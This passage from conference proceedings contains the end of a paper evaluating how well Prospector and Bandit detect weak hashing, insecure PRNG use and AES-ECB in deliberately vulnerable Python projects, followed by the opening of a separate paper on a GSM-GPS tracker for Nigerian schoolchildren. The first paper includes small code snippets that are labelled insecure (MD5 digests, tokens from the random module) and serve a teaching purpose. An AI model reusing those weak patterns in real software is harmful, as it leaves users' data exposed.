Using Bandit for static analysis can identify security defects in Python code early in the development process, before production. Errors can also be detected and resolved in existing projects [1]. Issues relevant to this study of cryptography within these scripts included weak hashing algorithms, insecure block cipher modes, and pseudo-random number generation, while unrelated security issues included invalid pickle serialization and deserialization, shell injections, and SQL injections [32]. The issue detection report output by Bandit upon initial analysis is categorized by identification codes for detectors, mnemonic names, brief descriptions, severity (S) metrics, confidence (C) of detection for an issue, and references for further information, following Bandit’s source code. Detected issues can be further classified into one of seven specific concerns: generic issues, a single detector for running a particular web application in debug mode, function calls, import statements, insecure network protocols, code injections, and cross-site scripting [33].
4 Methodology

The five sources were first examined through manual review by the authors to identify prospective issues related to cryptography. Once identified and enumerated, these issues were checked against the findings, or lack thereof, in the Prospector and Bandit output. Each repository was scanned by each of the two static analysis tools, Prospector and Bandit, for secure scripting vulnerabilities including, but not limited to, insecure hashing algorithms, insecure block ciphers, and hardcoded passwords. The sources include preconstructed custom scripts with manual implementations of AES-128 ECB and other open-source scripts available on GitHub [34]. The open-source portion of the dataset includes Contrast-Security-OSS/vulnpy [16], fportantier/vulpy [17], jorritfolmer/vulnerable-api [18], and sgabe/DSVPWA [19]. Running both a single-file script and larger projects of various sizes validates that scalability is not an issue for the detection of issues within code.

4.1 ECB Mode Benchmark

We used an AES-128 implementation with ECB mode as a base case to illustrate tool findings on a small-scale project. As mentioned in prior sections, ECB was not developed for secure use and remains the weakest mode of operation. PyCryptodome, for example, is a package that provides ECB mode in Python [35]. The code analyzed defines a block size of 16 bytes and includes padding and unpadding variables to account for inputs of different byte lengths [36]. The code under investigation implements an encrypt method with crypto keys and encoding.

4.2 Open-Source Repository Information for Four Projects

Static analysis review of cryptography in the scope of open-source development is essential. Projects such as Android and the Linux kernel are open-source and are used by millions of users on a daily basis [37]. This gives importance to reviewing certain types
of projects whether they are open-source or not [38]. Testing smaller sets of vulnerable open-source code can serve as a benchmark when testing sets of larger-scale projects.

The first open-source repository under examination is vulpy, a repository with known vulnerabilities such as Cross-Site Scripting (XSS), Insecure Deserialization, SQL Injection (SQLi), Authentication Bruteforce, Authentication Bypass, and Cross-Site Request Forgery (CSRF). Initial inspection of the source code revealed hardcoded passwords in the file db.py. Ideally, Bandit should detect this as an issue for remediation.

Vulnpy is the second open-source project inspected. It is a deliberately insecure repository containing several web application vulnerabilities across its Flask, Django, Pyramid, Falcon, Bottle, and FastAPI integrations, among other APIs. Installing its dependencies beforehand through pip, or using a virtual environment, is recommended. Manual inspection of the code reveals insecure MD5 hashing and a pseudo-random number generator implementation.

The third repository, Damn Simple Vulnerable Python Web Application (DSVPWA), features a series of vulnerabilities, including very basic session management and HTML (HyperText Markup Language) templating. It can demonstrate attacks including Cross-Site Request Forgery, Command Injection, and Deserialization of Untrusted Data, among others. Prior to analysis, we anticipated the presence of one hardcoded password.

The fourth repository under examination is vulnerable-api, which includes key vulnerabilities such as insecure transport, user enumeration, information disclosure, authentication bypass, no input validation, SQL injection, weak session token cryptography, poor session validation, plaintext storage of secrets, command injection, regex denial of service, cross-site scripting, and missing security headers.
Static analysis was predicted to identify the presence of insecure hashing algorithms.

4.3 Analysis of Open-Source Repositories with Static Analysis Tools

The static analysis process was designed around two tools: Prospector and Bandit. Prospector served as a baseline for what the average static analysis tool is able to identify. Bandit is a security-specific static analysis tool equipped with more resources to identify possible cryptographic issues in the different code samples [33]. Based on the initial manual inspection of the code bases, Bandit was expected to output B303 (MD5), which describes the use of MD2, MD4, MD5, or SHA1 hash functions [33]; B305 (cipher modes), which describes the use of insecure cipher modes [33]; and B311 (random), which describes the use of pseudo-random generators for cryptography or security tasks [33]. Figure 2, from Ruohonen et al. [33], shows examples of issues detected with Bandit, with plugins enabling more custom detections.
Fig. 2. Issue types detected by Bandit [33]
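Two of the three patterns that Section 4.3 expects Bandit to report, weak hashing (B303) and pseudo-random generation for security tasks (B311), can be shown side by side with standard-library alternatives. This is an illustrative sketch only: the function names are hypothetical and the snippet is not taken from any of the analyzed repositories. The insecure cipher mode case (B305) is omitted because it would require a third-party cipher package.

```python
import hashlib
import random
import secrets


def weak_fingerprint(data: bytes) -> str:
    # Pattern of the kind described as B303: MD5 used as a security hash.
    return hashlib.md5(data).hexdigest()


def stronger_fingerprint(data: bytes) -> str:
    # SHA-256 is not among the hash functions listed under B303.
    return hashlib.sha256(data).hexdigest()


def predictable_token(seed: int) -> str:
    # Pattern of the kind described as B311: the random module is a
    # deterministic Mersenne Twister, so a known seed reproduces the "secret".
    rng = random.Random(seed)
    return "%032x" % rng.getrandbits(128)


def unpredictable_token() -> str:
    # The secrets module draws from the operating system's secure source.
    return secrets.token_hex(16)


print(weak_fingerprint(b"password"))
print(stronger_fingerprint(b"password"))
print(predictable_token(7) == predictable_token(7))
print(unpredictable_token())
```

Replacing MD5 with SHA-256 only addresses the weak-algorithm pattern; storing passwords would normally call for a dedicated password-hashing scheme rather than a bare digest.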
5 Findings

The findings from Prospector were not specific to cryptographic vulnerabilities or weaknesses; rather, they were recommendations to improve code style and to remove unnecessary, unused, or redundant portions of the code. Security-related findings pertained to outdated packages and missing imports. Across the five analyzed test cases (n = 4 open-source projects and n = 1 benchmark), Prospector produced 327 messages of varying severity under the default strictness and profile, none of which drew attention to the cryptographic issues present.

Prospector detected a total of 71 issues in DSVPWA with the default profile, but none referred to the misuse of cryptography. All detections referred to specific web-application vulnerabilities. Prospector detected 66 concerns in vulnerable-api with the default profile; these mostly referred to misplaced or unused imports and not to cryptography misuse, even though the project is known to contain weak session token cryptography. Vulpy produced 69 messages with the default profile and level of strictness, none pertaining to cryptography. Concerns included an unnecessary “else” after “return”, unused imports, trailing newlines, and if statements that can be replaced with return statements. As remediation, developers can remove unused dependencies and imports, since these can be additional vectors for attack; doing so adds a layer of application security. Vulnpy, the third of the four open-source projects, produced 121 concerns, none pertaining to cryptographic issues despite the presence of insecure hashing and pseudorandomness within the code. The fifth and final test case run through Prospector was the AES-128 ECB script, which is inherently insecure because of its use of an insecure block mode.
Prospector returned no concerns regarding the use of AES or primitive methods within the Crypto Cipher packages, and returned a total of 0 warning messages for the code. This demands special attention because developers employing
Python Cryptographic Secure Scripting Concerns
insecure methods of encryption similar to ECB could run their scripts through these tools and have no warnings returned to them, namely a false negative.
Table 1. Cryptography-related issues detected by each tool
Issue | Prospector | Bandit
Weak Hashing Algorithms | X | ✓
Pseudo Random Number Generator | X | ✓
Insecure Block Ciphers | X | X
Bandit yielded many results regarding security-related vulnerabilities, with some pertaining to cryptography-specific concerns, as shown in Table 1 and Fig. 3. For Vulpy, Bandit reported 43 total issues, none of them pertaining to the subject matter of this study. B105 (hardcoded passwords) was reported, but it is outside the scope of cryptography in this research, as it would typically fall into the OWASP Insecure Data Storage category [38]. The second repository we configured Bandit to analyze was Vulnpy, for which it reported a total of 89 issues. In terms of cryptography, the tool reported n = 4 instances of B324 (use of weak MD4, MD5, or SHA1 hash for security) and n = 4 instances of B311 (pseudo-random number generators, PRNG). The third repository analyzed with Bandit was vulnerable-api, with 16 total issues, 2 of which refer to insecure hashing (B324) and are therefore relevant to the study. The fourth repository analyzed was DSVPWA, for which Bandit reported no issues in the scope of cryptography. Other than the high-severity report, the second report was of a hardcoded password, which is outside the cryptography scope of this study. The fifth case, the ECB.py benchmark, returned n = 2 messages, with only n = 1 pertaining to insecure hashing and the other, outside the scope of this research, related to a deprecated package. Bandit was expected to return message B305 describing an insecure block mode; however, this was not the case. While the creation of Python-specific security static analysis tools has given developers the ability to identify security-specific concerns throughout the secure software development lifecycle, manual review and testing are still necessary to distinguish between true positives, false positives, true negatives, and false negatives. In addition, security-specific static analysis tools have limited capability to perform effective cryptography analysis.
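To make the B324 and B311 findings concrete, the following is a minimal sketch of the kinds of calls involved, next to standard-library alternatives. It is not taken from the analyzed repositories; the function names are hypothetical and chosen only for illustration, and SHA-256 is used as one example of a hash that is not among the weak ones named above.

```python
import hashlib
import random
import secrets


def weak_digest(data: bytes) -> str:
    # MD5 is one of the weak hashes named in the B324 finding text.
    return hashlib.md5(data).hexdigest()


def stronger_digest(data: bytes) -> str:
    # SHA-256 is shown as an assumed replacement, not the paper's prescription.
    return hashlib.sha256(data).hexdigest()


def weak_token(n_bytes: int = 16) -> str:
    # The random module is a deterministic PRNG; its output can be
    # reproduced by anyone who knows or recovers the seed.
    return "".join(f"{random.randrange(256):02x}" for _ in range(n_bytes))


def stronger_token(n_bytes: int = 16) -> str:
    # The secrets module draws from the operating system's secure source.
    return secrets.token_hex(n_bytes)
```

Seeding the `random` module with the same value twice and calling `weak_token` after each seed yields the same token, which is the property that makes it unsuitable for session tokens. For password storage specifically, a plain hash of any kind is usually not considered sufficient, but that is beyond what this sketch shows.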
Most output from the Prospector tool concerns style or code efficiency rather than vulnerabilities. Bandit produced considerable output in terms of vulnerabilities, but limited output in terms of cryptography-specific concerns. The total number of detections for each issue can be seen in Table 2. Considering the severity of exposure when using ECB mode and other primitive block cipher modes, static analysis tools need to adopt detection of these vulnerabilities in order to provide a more cohesive overview of application security. Although it is outside the scope of cryptography misuse, instances of insecure data storage [38] were also detected, in the form of hardcoded passwords and storing data
G. LaMalva et al.
Fig. 3. Bandit findings
Table 2. Number of Each Issue Type Found in Bandit
Issues | Vulpy | Vulnpy | Vulnerable-api | DSVPWA | ECB.py
Weak Hashing algorithms | 0 | 4 | 2 | 0 | 1
PRNG | 0 | 4 | 0 | 0 | 0
Insecure Block Ciphers | 0 | 0 | 0 | 0 | 0
on the /tmp directory. Bandit detected n = 1 instance of hardcoded passwords in DSVPWA and n = 5 instances in Vulpy, reported under the Bandit finding label B105. The tools identified only the Vulpy repository as storing data in the /tmp directory, which is typically world-readable and world-writable (if it were not, most applications would not be able to create or read temporary files there). That accessibility makes the location even more exposed to any attacker or prowler who gains access [39].
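One common way to reduce the exposure of temporary data is to let the standard library create the file instead of writing to a fixed path under /tmp. The sketch below is an illustration under that assumption and is not drawn from the analyzed repositories; `write_private_temp` and `is_owner_only` are hypothetical helper names.

```python
import os
import stat
import tempfile


def write_private_temp(data: bytes) -> str:
    """Write data to a newly created temporary file and return its path."""
    # mkstemp picks an unpredictable name and creates the file exclusively;
    # on POSIX systems the file is readable and writable only by its owner.
    fd, path = tempfile.mkstemp(prefix="app-")
    with os.fdopen(fd, "wb") as handle:
        handle.write(data)
    return path


def is_owner_only(path: str) -> bool:
    """Return True if no group or other permission bits are set (POSIX)."""
    mode = stat.S_IMODE(os.stat(path).st_mode)
    return mode & 0o077 == 0
```

The caller remains responsible for deleting the file when it is no longer needed, for example with `os.remove(path)`.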
6 Discussions
This research reports on case studies of open-source Python scripts analyzed with two popular Python static analysis tools, Prospector and Bandit. Static tools can be employed as a first line of defense to help developers build software that uses functions and capabilities correctly, lowering the risk of known concerns, especially if the number of false positives remains low [41]. The intended identification of specific vulnerabilities within the analyzed code can mitigate further risks early in the development
process, so that fixes for the coding errors can be initiated sooner. It is important to detect security concerns where non-secure operations, such as ECB mode encryption, are known to be more susceptible to cyber-attacks than more advanced approaches. The methodology and findings of this research show that some cryptographic concerns remain undetected by these Python static analysis tools.
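As an illustration of how small the missing check could be, the sketch below walks a Python syntax tree and reports lines that reference a name `MODE_ECB`, the constant used to select ECB mode in the Crypto.Cipher packages. This is a hypothetical, simplified detector written for this discussion; it is not how Bandit or Prospector are implemented, and the function name `find_ecb_usages` is an assumption.

```python
import ast


def find_ecb_usages(source: str) -> list[int]:
    """Return sorted line numbers that reference a name called MODE_ECB."""
    tree = ast.parse(source)  # parses only; the analyzed code is never run
    hits = set()
    for node in ast.walk(tree):
        # Matches attribute access such as AES.MODE_ECB ...
        if isinstance(node, ast.Attribute) and node.attr == "MODE_ECB":
            hits.add(node.lineno)
        # ... and a bare MODE_ECB name imported directly.
        elif isinstance(node, ast.Name) and node.id == "MODE_ECB":
            hits.add(node.lineno)
    return sorted(hits)


SAMPLE = '''\
from Crypto.Cipher import AES

def encrypt(key, data):
    cipher = AES.new(key, AES.MODE_ECB)
    return cipher.encrypt(data)
'''
```

Calling `find_ecb_usages(SAMPLE)` reports line 4 of the sample. A production check would also need to handle aliases, mode constants passed as integers, and other libraries, which this sketch deliberately ignores.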
7 Conclusions and Future Work
Technological advancement worldwide continues without pause. It is therefore essential that the methods of secure scripting and cryptography are maintained and continually reviewed. The future of cryptography may introduce new secure possibilities for data privacy and encryption, such as those in the field of cloud computing, cryptography associated with quantum computing, and fully homomorphic encryption. Although these advancements show promise for cryptography and secure scripting, it is important to recognize the implications and challenges that can develop as a result of neglected vulnerabilities and constructions, such as those identified in the conclusions of this research. As seen through the literature review, numerous Python tools are available for stylistic improvements and for time and space optimization, but few such tools fall under the umbrella of security, and fewer still address cryptography. This paper examines cryptography through the static analysis tools described in order to address the lack of research in this field. This research communicates the need for specialized static analysis tools that detect insecure use of cryptography, giving special attention to the gap between the issues a tool is intended to detect and those it actually reports. Cryptography should be considered in the creation of static analysis tools in order to give a cohesive overview of the security issues present. Considering the different key generation methods, block modes, encryption schemes, and ciphers available, it would benefit the application security community to have a comprehensive tool that detects Python-specific cryptography issues.
References 1. Gulabovska, H., Porkolab, Z.: Survey on static analysis tools of python programs. http://ceurws.org/Vol-2508/paper-gul.pdf. Accessed 29 May 2022 2. McGraw, G., et al.: Static analysis for security. Institute of Electrical and Electronics Engineer (2004), vol. 2:6, pp. 76–79. https://ieeexplore.ieee.org/abstract/document/1366126 3. Braga, A., Dahab, R., Antunes, N., Laranjeiro, N., Vieira, M.: Understanding how to use static analysis tools for detecting cryptography misuse in software. IEEE Trans. Reliab. 68(4), 1384–1403 (2019). https://doi.org/10.1109/TR.2019.2937214 4. Chess, B., West, J.: Secure Programming with Static Analysis. United States: Pearson Education (2007) 5. Gulabovska, H., Porkoláb, Z.: Evaluation of Static Analysis Methods of Python Programs. ipsitransactions, July 2020 6. Dong, T., Chen, L., Xu, Z., Yu, B.: Static type analysis for python. In: 2014 11th Web Information System and Application Conference, pp. 65–68 (2014). https://doi.org/10.1109/ WISA.2014.20
7. Lindstrom, G.: Programming with python. IT Professional 7(05), 10–16 (2005) 8. P.T.G.H. Inc., P. Thomson, G. H. Inc., G. H. I. V. Profile, and O. M. V. A. Metrics: Static Analysis: An introduction: The fundamental challenge of software engineering is one of Complexity. Queue, vol. 19, no 4, Queue. https://dl.acm.org/doi/10.1145/3487019.3487021. Accessed 28 May 2022 9. Ferrer, F., More, A.: Towards secure scripting development. Argentina Software Development Center, vol. 1, pp. 42–53 (2011). https://40jaiio.sadio.org.ar/sites/default/files/T2011/WSegI/ 972.pdf 10. Nielson, J., Monson, C.: Practical Cryptography in Python: Learning Correct Cryptography by Example, 1st edn. Apress (2019) 11. Qadir, A.M., Varol, N.: A review paper on cryptography. In: 2019 7th International Symposium on Digital Forensics and Security (ISDFS), pp. 1–6 (2019). https://doi.org/10.1109/ISDFS. 2019.8757514.URL: https://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=8757514& isnumber=8757466 12. Kessler, G.C.: An overview of cryptography - princeton university. https://www.cs.princeton. edu/~chazelle/courses/BIB/overview-crypto.pdf. Accessed 29 May 2022 13. Mundt, M., Baier, H.: Towards mitigation of data exfiltration techniques using the MITRE ATT&CK framework. Research Institute CODE, Universität der Bundeswehr München, Germany, vol. 1 pp. 1–22 (2021). https://www.unibw.de/digfor/publikationen/pdf/2021-12-icd f2c-mundt-baier.pdf 14. Algoma. https://archives.algomau.ca/main/sites/default/files/2012-25_001_011.pdf. Accessed 28 May 2022 15. Devi, S.V., Kotha, H.D.: Journal of Physics: Conference Series; Bristol, vol. 1228, Iss. 1, May 2019 16. Contrast-security-OSS/VULNPY: Purposely-vulnerable python functions. GitHub. https://git hub.com/Contrast-Security-OSS/vulnpy. Accessed 28 May 2022 17. Fportantier, Fportantier/vulpy: Vulnerable python application to learn secure development. GitHub, 14 Sep 2020. https://github.com/fportantier/vulpy. Accessed 28 May 2022 18. 
Jorritfolmer/vulnerable-API: Enhanced Fork with logging, openapi 3.0 and Python 3 for Security Monitoring Workshops. GitHub. https://github.com/jorritfolmer/vulnerable-api. Accessed 28 May 2022 19. sgabe/DSVPWA: Damn simple vulnerable python web application. GitHub. https://github. com/sgabe/DSVPWA. Accessed 28 May 2022 20. Random - generate pseudo-random numbers. random - Generate pseudo-random numbers - Python 3.10.5 documentation. https://docs.python.org/3/library/random.html. Accessed 27 May 2022 21. Secrets - generate secure random numbers for managing secrets. secrets - Generate secure random numbers for managing secrets - Python 3.10.5 documentation. https://docs.python. org/3/library/secrets.html#module-secrets. Accessed 27 May 2022 22. Braga, A., Dahab, R., Antunes, N., Laranjeiro, N., Vieira, M.: Practical evaluation of static analysis tools for cryptography: benchmarking method and case study. In: 2017 IEEE 28th International Symposium on Software Reliability Engineering (ISSRE), pp. 170–181 (2017). https://doi.org/10.1109/ISSRE.2017.27 23. Wickert, A.-K., et al.: Python crypto misuses in the wild. In: ESEM Conference Bari, Italy (2021), vol. 1, pp. 1–6. https://dl.acm.org/doi/pdf/10.1145/3475716.3484195 24. Schmeelk, S., Tao, L.: A case study of mobile health applications: the OWASP risk of insufficient cryptography. J. Comput. Sci. Res. [S.l.] 4(1) (2022). ISSN 2630-5151. https://ojs.bil publishing.com/index.php/jcsr/article/view/4271. Accessed 28 May 2022. https://doi.org/10. 30564/jcsr.v4i1.4271 25. Rahaman, S., et al.: Cryptoguard. In: Proceedings of the 2019 ACM SIGSAC Conference on Computer and Communications Security (2019). https://doi.org/10.1145/3319535.3345659
26. Acar, Y., Stransky, C., Wermke, D., Weir, C., Mazurek, M.L., Fahl, S.: Developers need support, too: a survey of security advice for software developers. In: 2017 IEEE Cybersecurity Development (SecDev) (2017) 27. Muske, T., Khedker, U.P.: Efficient elimination of false positives using static analysis. In: 2015 IEEE 26th International Symposium on Software Reliability Engineering (ISSRE), pp. 270–280 (2015). https://doi.org/10.1109/ISSRE.2015.7381820 28. Thung, F., Lucia, Lo, D., Jiang, L., Rahman, F., Devanbu, P.T.: To what extent could we detect field defects? an empirical study of false negatives in static bug finding tools. In: 2012 Proceedings of the 27th IEEE/ACM International Conference on Automated Software Engineering, pp. 50–59 (2012). https://doi.org/10.1145/2351676.2351685 29. Chess, B., McGraw, G.: Static analysis for security. IEEE Secur. Privacy 2(6), 76–79 (2004). https://doi.org/10.1109/MSP.2004.111 30. Sphinx-Quickstart: Prospector - python static analysis. Webpage (2014). https://prospector. landscape.io/en/master/index.html 31. Brown, E.: PyCQA - Bandit. GitHub (2022). https://github.com/PyCQA/bandit 32. Luminousmen. “Python static analysis tools.” Webpage (2021). https://luminousmen.com/ post/python-static-analysis-tools 33. Ruohonen, J., Hjerppe, K., Rindell, K.: A large-scale security-oriented static analysis of python packages in PyPI. University of Turku, Finland, vol. 1, pp. 1–10 (2021) 34. Github: GitHub. https://github.com/. Accessed 28 May 2022 35. Local Coder: Python: ignore ‘incorrect padding’ error when base64 decoding. Webpage (2022). https://localcoder.org/python-ignore-incorrect-padding-error-when-base64-decoding 36. Projects: Linux Foundation, 28 June 2022. https://www.linuxfoundation.org/projects/. Accessed 30 June 2022 37. Kannavara, R.: Securing opensource code via static analysis. In: 2012 IEEE Fifth International Conference on Software Testing, Verification and Validation, pp. 429–436 (2012). https://doi. 
org/10.1109/ICST.2012.123 38. M2: Insecure data storage: M2: Insecure Data Storage | OWASP Foundation. https:// owasp.org/www-project-mobile-top-10/2016-risks/m2-insecure-data-storage. Accessed 28 May 2022 39. Enforcing security for temporary files. SpringerLink, 01 Jan 1970. https://link.springer.com/ chapter/10.1007/978-1-4302-0057-4_15?noAccess=true#citeas. Accessed 28 May 2022 40. IBM explores the future of Cryptography: IBM Newsroom. https://newsroom.ibm.com/IBMExplores-the-Future-of-Cryptography 41. Chen, Z., Chen, L., Zhou, Y., Xu, Z., Chu, W.C., Xu, B.: Dynamic slicing of python programs. In: 2014 IEEE 38th Annual Computer Software and Applications Conference (2014). https:// doi.org/10.1109/compsac.2014.30
Developing a GSM-GPS Based Tracking System: Vulnerable Nigerian School Children as a Case Study
Afolayan Ifeoluwa(B) and Idachaba Francis
Covenant University, Km. 10 Idiroko Road, Ota, Ogun State, Nigeria
Abstract. GSM-GPS based tracking technology has been implemented in several problem-solving approaches that involve some form of geolocation, most prominently in vehicular tracking systems. In Nigeria, schoolchildren have become increasingly vulnerable as a result of an unending tally of school invasions and abductions. An effective initiative to secure the future of Nigeria through its children has yet to be taken. Industry can meet the government in the middle through the employment and improvement of existing GSM-GPS based tracking technology. The goal of the tracker detailed in this paper is to incorporate GSM-GPS based technology in a real-time monitoring system for children, employing an Arduino microcontroller as its central processing unit. If contracted and used as a deterrent against terrorism-related mass abductions in Northern Nigeria, where children are especially vulnerable and without the necessary resources to purchase a sophisticated tracking system, it could be considered a business-to-government (B2G) model and not a strictly commercial venture.
Keywords: GSM-GPS · Schoolchildren · B2G
1 Introduction
Counting the number of recent school abductions in Nigeria is both sobering and frightening, especially for academics from formal education institutions. At present, most analyses have failed to examine these abductions beyond the spectacle of their audacity, the details of the abduction itself, and the identification of perpetrators [1]. The focus on culpability for the attacks, or on the avoidance of culpability, obscures the crucial focal points of these tragic events: the time-sensitive restoration of these children to their families and the implementation of a sustainable, long-term solution to the problem [1]. Since 2014, approximately one thousand four hundred schools have been lost, with approximately one thousand two hundred and eighty school staff and schoolchildren as casualties [2]. Even excluding terrorism-related mass abductions, which are a primary motivation for this paper, about one thousand five hundred schoolchildren in states across the nation, especially girls, have been abducted by armed bandits in various instances between 2014 and 2021 for ransom and other sinister purposes [2].
© The Author(s), under exclusive license to Springer Nature Switzerland AG 2023 K. Arai (Ed.): FICC 2023, LNNS 652, pp. 614–634, 2023. https://doi.org/10.1007/978-3-031-28073-3_43
A tracking system can be used to respond to these elementary sources of risk to Nigerian schoolchildren and significantly reduce their vulnerability. Using the proposed GSM-GPS-based technology to develop a tracker affixed to a child, which combines basic GSM (Global System for Mobile Communication) network data transmission with GPS (Global Positioning System) position-locating features, the real-time location of abducted or missing children can be determined.
1.1 Vulnerability Points in Nigerian School Children as a Basis for Tracker Functionality
A review of vulnerability in Nigeria, vulnerability in children as opposed to adults, and vulnerability in children in Nigeria was carried out to provide a basis for the tracking system’s functionality, pointing to add-ons to the tracker that follow from these vulnerability points.
Vulnerability in Nigeria. Nigeria’s current insecurity situation has eaten deep into the nation’s roots, manifesting itself across all 36 states in the form of armed and unarmed banditry, fraud, corruption, kidnappings, religious and political violence, rape, cultism, ritual killings, insurgency and child abductions. The incapacity of the national security implementation framework to lessen the vulnerability of Nigerian residents has exacerbated the country’s internal security situation, particularly since the country’s restoration to democracy [3].
Vulnerability in Children as Opposed to Adults. Considering internal factors alone, adults are largely invulnerable, as they are individuals with fully matured cognitive capacities, meaning that they can make intelligent and informed decisions concerning their well-being [4]. However, external factors like threat and endangerment can understandably decrease this level of invulnerability. By contrast, when considered individually and apart from a guardian or parent, children are potentially the most vulnerable individuals in society, considering both internal and external factors.
Merging these internal and external factors and applying them to hypothetical situations, we can evaluate the prospect of vulnerability in children as opposed to adults under the following proposed isolated conditions:
a) Firstly, the condition of making intelligent and informed decisions as a precaution against danger. Illustrations of this condition include actions that adults commonly take ahead of exposure to danger, such as sharing locations with friends and family, remaining on high alert in potentially dangerous environments, and possessing low-intensity weapons such as tasers, pepper sprays, and pocket knives for self-defence; these are all measures that children have not yet developed the cognitive capacity to reason out or the initiative to take.
b) Secondly, the condition of having a higher probability of falling into a dangerous situation or being targeted by a dangerous individual. Children are smaller in stature, have inadequate traffic experience, quickly lose attention [5] and are mostly extremely naïve. These qualities increase the likelihood of children, as opposed to adults, losing track of their surroundings and consequently going missing or falling
into dangerous situations. Children, by reason of their physical, psychological and knowledge capabilities, together with their unsuspecting natures, are also particularly vulnerable [6] and ultimately preferred by dangerous persons, as they can easily be convinced or overpowered into dangerous situations.
c) Thirdly, the condition of being conscious of when their safety has been compromised and they have been placed in a dangerous situation. As opposed to adults, children are usually unaware of when they are at risk and can easily be convinced otherwise when they are with a dangerous individual and in a dangerous situation.
d) Lastly, the condition of being able to take steps in the unlikely event that they come to understand that they are in a dangerous situation. The inherent qualities of children mentioned above render them mostly incapable of extricating themselves from dangerous situations, especially perilous situations involving adults who can effortlessly outsmart and circumvent any efforts they make.
Vulnerability in Children in Nigeria. Henceforward, children in this paper will be considered in the context of being without their parent or guardian, as is the case with schoolchildren for the duration of the day they spend at school and, for most, on their way to and from school. We have established that when considering the vulnerability, and by implication the safety, of children, we need to be particularly sensitive as opposed to considering the same for adults, because even adults are rendered vulnerable under certain insecure conditions. Al-Dawamy and Sulaiman (2010) in Mariana et al. (2017) observed a growing prevalence of crime against schoolchildren each year, such that walking to school is now extremely unsafe [6]. Recently, even at school, children have also been left exposed to all sorts of danger, in an unending tally of school invasions. Hundreds of children were taken from Nigerian schools between December 2020 and August 2021 [1].
According to the July 2021 Report of the United Nations Children’s Emergency Fund, UNICEF, more than nine hundred and fifty schoolchildren were abducted from schools, primarily in North-West Nigeria and other regions in the country, in seven months (December 2020 to July 2021) [2]. At one point, nearly 500 students were abducted in four isolated instances spanning just six weeks across North-Central and North-West Nigeria in 2021 [2]. There were at least twelve mass abductions and four attempted abductions in just nine months between December 2020 and August 2021, causing nationwide outrage over the government’s apparent incapacity to deal with and avoid similar tragedies [1]. The tracker proposed in this paper will be designed to locate any individual or object, adult or child, but its distinguishing feature is that its design will incorporate solutions specifically for these emphasized vulnerability points of children. These vulnerability points will be addressed in the tracking system’s design by considering conditions three (c) and four (d) of the four previously defined conditions in the preceding subsection. For instance, although a panic button will be included in case an abducted individual comes to understand that they have been put in danger, most children will not come to this understanding, as has been established under condition three (c). To compensate for this, the design will include a feature that automatically sends the child’s coordinates to their guardian when the child has moved more than 50 m from a pre-set location, for example, school, or has left a particular walking route pre-set by that guardian. Using these technology-based location finders, with practical and reasonable precision and response time, in the recovery of the abducted child also compensates for children’s general inability to extricate themselves from dangerous situations, as was established under condition four (d), effectively accommodating yet another vulnerability point of children.
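The 50 m rule described above amounts to a distance check between the latest GPS fix and the pre-set location. The following is a minimal sketch of that check using the haversine great-circle formula; the formula choice, the function names and the example coordinates are assumptions made for illustration and are not specified in the paper. The tracker itself is Arduino-based, so the same logic would be ported to the firmware's language; Python is used here only to show the logic.

```python
import math

EARTH_RADIUS_M = 6_371_000  # mean Earth radius in metres (approximation)


def haversine_m(lat1: float, lon1: float, lat2: float, lon2: float) -> float:
    """Great-circle distance in metres between two points in decimal degrees."""
    phi1, phi2 = math.radians(lat1), math.radians(lat2)
    d_phi = phi2 - phi1
    d_lambda = math.radians(lon2 - lon1)
    a = (math.sin(d_phi / 2) ** 2
         + math.cos(phi1) * math.cos(phi2) * math.sin(d_lambda / 2) ** 2)
    return 2 * EARTH_RADIUS_M * math.asin(math.sqrt(a))


def outside_geofence(fix: tuple[float, float],
                     centre: tuple[float, float],
                     radius_m: float = 50.0) -> bool:
    """Return True when the fix lies farther than radius_m from the centre."""
    return haversine_m(fix[0], fix[1], centre[0], centre[1]) > radius_m


# Hypothetical pre-set location (not a real school position).
SCHOOL = (9.0000, 7.0000)
```

With these values, a fix at (9.0010, 7.0000) is roughly 111 m from the centre and would trigger the alert, while a fix at (9.0003, 7.0000) is roughly 33 m away and would not. Checking departure from a pre-set walking route would need a distance-to-path calculation, which this sketch does not cover.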
2 Literature Review
GSM-GPS technology has been implemented in problem-solving approaches involving some form of geolocation, most prominently in vehicular tracking systems. This paper’s approach of utilizing that technology in a slightly more sophisticated version for geolocation and the enhancement of individual security, with children included and primarily considered, is one of the few available. In order to select the most feasible components, circuit configuration and overall design for the proposed tracking system, it is necessary to review previous works related to GSM-GPS technology. The aim is to choose the most suitable approach, to utilize the features of some approaches, or to modify and build upon one of these existing approaches.
2.1 Review of Related Works
Lee Chun Hong in [8] designed a child-tracking system to allow parents to keep track of their children when they are out of view. Both software and hardware were designed, together with several UML (Unified Modelling Language) diagrams, to meet the aim of the system. GPS modules serve as the core in ensuring the hardware functions as expected. Test users reported that the system works very efficiently, and the software developed has also been described as user-friendly and efficient in tracking. It depends largely on GPS, on the network connection of the devices and on the Google Application Programming Interface (API), and is observably too expensive for the users that this paper’s intended tracker will cater to.
The authors of [9] designed a real-time vehicle tracking system that operates via GPS and GSM technology using an AT89C51 microcontroller interfaced to a GSM modem and a GPS receiver. The GSM modem sends the position of the vehicle from a remote place, while the GPS receiver provides continuous data in real time. The system then sends a reply to the connected mobile phone to notify the user of the location and position of the vehicle.
The system was designed secondarily however to monitor driver behaviour but was unable to achieve this in theory. Using Open-Source Technologies, [10] developed a system that manages and controls the transport using a tracking device to know the scheduled vehicle and the current location of the vehicle. It was developed using a GPS-tracking device which is executed to work via SMS on a device. Satellite technology is also implemented with advanced computer modelling to track vehicles with a server and another application enabling the tracking function. Passengers are able to use this system to board a bus, be informed of
their current location and get information on the total number of passengers in the bus. The SMS functionality was however not very quick in receiving updates at times. Eddie Chi-Wah Lau in [11] developed a tracking system for two campuses in a University in Malaysia, which aids in tracking down the position of the campus buses. The system is made up of 2.4G network facilities which include an outdoor LED (Light Emitting Diode) panel, Base Station (BS), voice system, smartphone access, server, bus transceiver, BS Transceiver, an IVR System and the university’s existing network for data access. The Outdoor LED Panel is used to enable notifications or updates outside the bus and the BS for database updates, bus detection and information display. The IVR System aids in broadcasting the current time and bus status when a call has been put on by students, as seen on the GSM board. However, the system is quite complicated and is not designed to give the exact position of buses, just vital information on the arrival/departure of buses per station. In [12] a system for tracking vehicles on land is designed. The system is made up of a tracking system, a monitoring and control system, and an android application. The tracking system consists of a GPS device installed that sends the data calculated to a server while the monitoring and control system enables data access from the server on the web application. Finally, the android application enables data access from the server on the mobile application via the internet. This system is able to perform five (5) major functions which include, the addition of vehicle details, setting of route and destination, calculation of the speed of a vehicle; map display of the vehicle being tracked; and, setting 